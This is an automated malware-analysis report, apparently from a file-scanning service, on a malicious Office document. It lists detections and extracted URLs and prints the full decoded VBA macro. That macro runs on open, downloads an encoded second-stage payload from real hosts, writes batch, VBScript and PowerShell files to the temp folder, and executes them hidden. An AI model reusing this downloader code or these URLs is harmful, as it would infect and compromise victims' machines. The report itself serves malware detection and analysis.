MALICIOUS
314
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
The sample is a malicious Office document containing VBA macros. The Auto_Open macro attempts to download a payload from a hardcoded URL, specifically reconstructing the URL 'http://barsa.cba.pl/modules/mod_araticlws/6612536153.txt123123123' from concatenated strings and Chr() calls. The script also attempts to construct URLs pointing to 'savepic.su' and 'evaairklima.com'. This indicates an attempt to download and execute a second-stage payload.
Heuristics 12
-
ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
-
VBA macros detected medium 8 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell(b, 0) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set objHTTP = CreateObject("MSXML2.ServerXMLHTTP") -
Payload URL assembled from a Chr()/Asc() string expression (6 URLs) high OLE_VBA_EXPR_DROPPER_URLA VBA macro builds its stage-2 download URL character by character from string literals concatenated with Chr()/Asc()/StrReverse() results — often nested (Chr(Asc(Chr(Asc("h")))) = "h") and split across the + and & operators, sometimes written out via Print #n, into a second-stage VBScript/PowerShell file. The URL is assembled at run time and never appears contiguously on disk, and there is no numeric array to brute-force, so a literal scan and the array recoverers both miss it. A bounded expression evaluator resolved it; surfaced as an IOC. Self-validating: only a valid host URL that is not already present verbatim in the macro is reported, so a benign macro cannot false-positive.
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open() -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Auto_Open -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
Environ(a) -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://savepic.su/5590773.png Referenced by macro
- http://savepic.su/5588725.pngReferenced by macro
- http://evaairklima.com/modules/mod_araticlws/6612536153.txtReferenced by macro
- http://evaairklima.com/modules/mod_araticlws/lns.txtReferenced by macro
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://ns.adobe.com/exif/1.0/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
- http://barsa.cba.pl/modules/mod_araticlws/lns.txtReferenced by macro
- http://barsa.cba.pl/modules/mod_araticlws/6612536153.txt123123123Referenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8299 bytes |
SHA-256: 9504180162c0c5972f36501c97f53dcb714bac31aaf358b9c42f86beb9618853 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Workbook_Open()
Auto_Open
End Sub
Sub Buhefwbfdsmbfh()
ijiqwhdkqwqw
End Sub
Sub Auto_Open()
ijiqwhdkqwqw
End Sub
Sub ijiqwhdkqwqw()
Dim huwe, auwd As Integer
Dim fileNumber As Integer
Dim retVal As Variant
HUWQD = Module1.Whqwhdbgh(30000)
FL2 = HUWQD
HPPSDJ = "Temp"
PH2 = Module1.Bad("" & HPPSDJ) + "\"
NDUWGD = "78192737129361298"
Dim HQUDWQH As String
Dim ashduwww As Integer
HQUDWQH = Format(Now(), "yyyymmdd")
ashduwww = Sgn(Val(HQUDWQH)) + 1
HYWDAX = "baqhjdiuwqhdiqhudhwiqht"
JWIDJIAAA = "" + Chr(97 + Sgn(5)) + "a"
HUYFEA = JWIDJIAAA + Right(HYWDAX, 1)
WKDOQ = NDUWGD
PSFL = FL2 + "" & "." + "p" + "" + Chr(Asc("s")) _
+ _
"1"
jiqwbdu = 110 + 3 + ashduwww
VBFL = FL2 + Chr(50 - 4) + "v" + "b" & Chr(jiqwbdu)
huwe = 4 + ashduwww - 5
BAFL = FL2 + Chr(Sgn(Fix(-22.043)) + 11 + 10 + 25 + huwe + 0) + HUYFEA
INTG = "" & "o" & "bject"
AFTG = "m" & "odule"
SXE = "" & Chr(Asc(".")) & Chr(101) & "xe" & ""
GNG = ".png"
PHT = "" & "htt" & "p://" & ""
SPIC = PHT + "sav" & "epic.su/"
QIWJD = PSFL
PSPTH = PH2 + QIWJD
VBPTH = PH2 + VBFL
BAPTH = PH2 + BAFL
DRT = 230
BFT = 231
CFT = 232
DFT = 233
EFT = 234
Dim PBIn As String, asdwq As String, MIWDWQ As String
PBIn = PHT + "barsa.cba.pl/modules/mo" & "d_araticlws/6612536153.txt"
CONT = Module1.Spice(PBIn)
asdwq = CONT
HQUWDAAA = "0"
If Len(asdwq) < 7000 Then
PBIn = PHT + "evaairklima.com/modules/mo" & "d_araticlws/6612536153.txt"
CONT = Module1.Spice(PBIn)
asdwq = CONT
HQUWDAAA = "1"
End If
CONT = Module1.Puqwndkqwb(asdwq)
TVT10 = Module1.Tort(CONT, "text10")
TVT20 = Module1.Tort(CONT, "text20")
TVT21 = Module1.Tort(CONT, "text21")
TVT30 = Module1.Tort(CONT, "text30")
TVT31 = Module1.Tort(CONT, "text31")
XPT1 = Module1.Tort(CONT, "stext1")
XPT2 = Module1.Tort(CONT, "stext2")
XPT3 = Module1.Tort(CONT, "stext3")
WVR = Module1.Bad("US" & "ERP" & "ROFILE")
QUWDHQWIUHUQWI = "jkh21 jkh1kj hjk12h j3kh21jkh1h21 3"
UWHDUYGWQUYDGWQYGDWUQ = "kjqhw djkqwhdkhiuqwhdih2 ih212"
hufehu1 = ""
hufehu1 = 0 + InStr(WVR, "sers\")
Dim hudhw As Integer
Dim ghdAdd(1 To 3)
ghdAdd(1) = "1"
ghdAdd(2) = "0"
ghdAdd(3) = "0"
If (hufehu1 <> 0) Then
ghdAdd(1) = "2"
Else
ghdAdd(2) = "3"
End If
JHWQUD = Join(ghdAdd)
hudhw = Val(JHWQUD)
Module1.WaitFor (1)
MIWDWQ = PHT + "barsa.cba.pl/modules/mo" & "d_araticlws/lns.txt"
If (HQUWDAAA = "1") Then
MIWDWQ = PHT + "evaairklima.com/modules/mo" & "d_araticlws/lns.txt"
End If
SEXX = Module1.Spice(MIWDWQ)
PSTB = PBIn + "123123123"
STAR1 = SPIC + "5590773" + GNG
STAR2 = SPIC + "5588725" + GNG
FFQ = "8"
FF = FFQ + SXE
Dim ashduqwihdq As Integer
ashduqwihdq = Val(129 + 60.123 \ Int("2") - 29 - hudhw)
If (ashduqwihdq = 0) Then
Open BAPTH For Output As #DRT
Print #DRT, XPT1
Print #DRT, ":lqwjdjqiw"
Print #DRT, ":lwijdsji"
Print #DRT, "set trfd=" + Chr(34) + PH2 + Chr(34)
Print #DRT, "set nmsj=" + Chr(34) + FL2 + Chr(34)
Print #DRT, "set exds=" + Chr(34) + FFQ + Chr(34)
Print #DRT, XPT2
Close #DRT
Module1.WaitFor (1)
Open VBPTH For Output As #BFT
Print #BFT, "strRT = " + Chr(34) + SEXX + Chr(34)
Print #BFT, "statRT = " + Chr(34) + STAR1 + Chr(34)
Print #BFT, "" & "jfeu" & "ygq = " + Chr(34) & "" + FF + Chr(34) & ""
Print #BFT, "strTecation = " + Chr(34) + PH2 + Chr(34) + "+jfeuygq"
Print #BFT, XPT3
Close #BFT
Module1.WaitFor (1)
NTH1 = Module1.Freat(retVal, BAPTH)
End If
If (hudhw = 200) Then
ZPQSKD = FL2
Open PSPTH For Output As #CFT
Print #CFT, "$ujdkwq = 'jqwdb';"
Print #CFT, "$stat = '" + STAR2 + "';"
Print #CFT, "$ggtt = '" + SEXX + "';"
Print #CFT, "$pths = '" + PH2 + "';"
Print #CFT, "$wehs = '" + ZPQSKD + "';"
Print #CFT, "$nnm = '" + FFQ + "';"
Print #CFT, TVT10
Close #CFT
Open VBPTH For Output As #DFT
Print #DFT, TVT30
Print #DFT, "currentFile = " + Chr(34) + PH2 + Chr(34) + "&" + Chr(34) + FL2 + Chr(34) + "&djwq" + ""
Print #DFT, TVT31
Close #DFT
Open BAPTH For Output As #EFT
Print #EFT, "@echo off"
Print #EFT, TVT20
Print #EFT, ":sadasdw"
Print #EFT, "set Rts5=" + Chr(34) + FL2 + Chr(34)
Print #EFT, "set Rts4=" + Chr(34) + PH2 + Chr(34) + "%Rts5%"
Print #EFT, TVT21
Close #EFT
Module1.WaitFor (1)
NTH2 = Module1.Freat(retVal, BAPTH)
End If
JUW = Chr(47)
AKK = Chr(60)
ZKK = ">"
NTH3 = Module2.Nybdqwd(AKK + INTG + ZKK, AKK & JUW + INTG + ZKK, 1)
NTH4 = Module2.Nybdqwd(AKK + AFTG + ZKK, AKK + JUW + AFTG + ZKK, 2)
NTH5 = Module2.Nybdqwd(AKK + INTG + ZKK, "", 3)
NTH6 = Module2.Nybdqwd(AKK + JUW + INTG + ZKK, "", 3)
NTH7 = Module2.Nybdqwd(AKK + AFTG + ZKK, "", 3)
NTH8 = Module2.Nybdqwd(AKK + JUW + AFTG + ZKK, "", 3)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Attribute VB_Name = "Module1"
Sub WaitFor(NumOfSeconds As Long)
Dim SngSec As Long
SngSec = Timer + NumOfSeconds
Do While Timer < SngSec
DoEvents
Loop
End Sub
Public Function Freat(a As Variant, b)
a = _
Shell(b, 0)
Freat = a
End Function
Public Function Spice(a As String)
Dim objHTTP As Object
Dim PriceSheetURL As String
PriceSheetURL = a
Set objHTTP = CreateObject("MSXML2.ServerXMLHTTP")
objHTTP.Open "GET", PriceSheetURL
objHTTP.Send ""
Spice = objHTTP.ResponseText
End Function
Public Function Whqwhdbgh(a As Integer)
Whqwhdbgh = CStr(Int((a * Rnd) + 10000))
End Function
Public Function Tort(a, b As String)
Dim krd, lent As Integer
UQWD = Chr(60)
NDUW = ">"
krd = InStr(1, a, UQWD + b + NDUW) + 8
lent = InStr(1, a, UQWD + "/" + b + NDUW) - krd
KLMN = Mid(a, krd, lent)
AUHWUD = KLMN
Tort = AUHWUD
End Function
Public Function Puqwndkqwb(ByVal strData As String) As String
Dim objXML As Object
Dim objNode As Object
Set objXML = CreateObject("MSXML2.DOMDocument")
Set objNode = objXML.createElement("b64")
objNode.DataType = "b" & "in" & "." & "base64"
objNode.Text = strData
WUDHA = objNode.nodeTypedValue
Puqwndkqwb = WUDHA
Set objNode = Nothing
Set objXML = Nothing
End Function
Public Function Bad(a As String)
Bad = _
Environ(a)
End Function
Attribute VB_Name = "Module2"
Public Function Nybdqwd(a As String, b As String, c As Integer)
Dim UQNDUAK As String, selectedText As String
Dim juhdwq As Range, tttwww As Range, selRange As Range
Set juhdwq = ActiveDocument.Range
Set tttwww = ActiveDocument.Range
With tttwww.Find
.Text = a
.MatchWholeWord = True
tttwww.Find.Execute
tttwww.Collapse direction:=wdCollapseEnd
IQJWDKLQWJDNKWQBDJKQW = "iqwue892ud82 d82u 19yd 99u2 dg2iuge yu2g1y21eas"
Set selRange = ActiveDocument.Range
QWHDUWQHIDW = "99iuausdoi uio 2uioeyu1i2 eu2i1e gi21yuge2i1 2i"
selRange.Start = tttwww.End
.Text = b
.MatchWholeWord = True
.Execute
tttwww.Collapse direction:=wdCollapseStart
selRange.End = tttwww.Start
If (c = 1) Then
selectedText = selRange.Delete
End If
If (c = 2) Then
selRange.Font.Color = wdColorBlack
End If
If (c = 3) Then
With tttwww.Find
.Text = a
.Replacement.Text = Chr(2 + 28 + 2)
.Wrap = wdFindContinue
.Execute Replace:=wdReplaceAll
End With
End If
End With
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.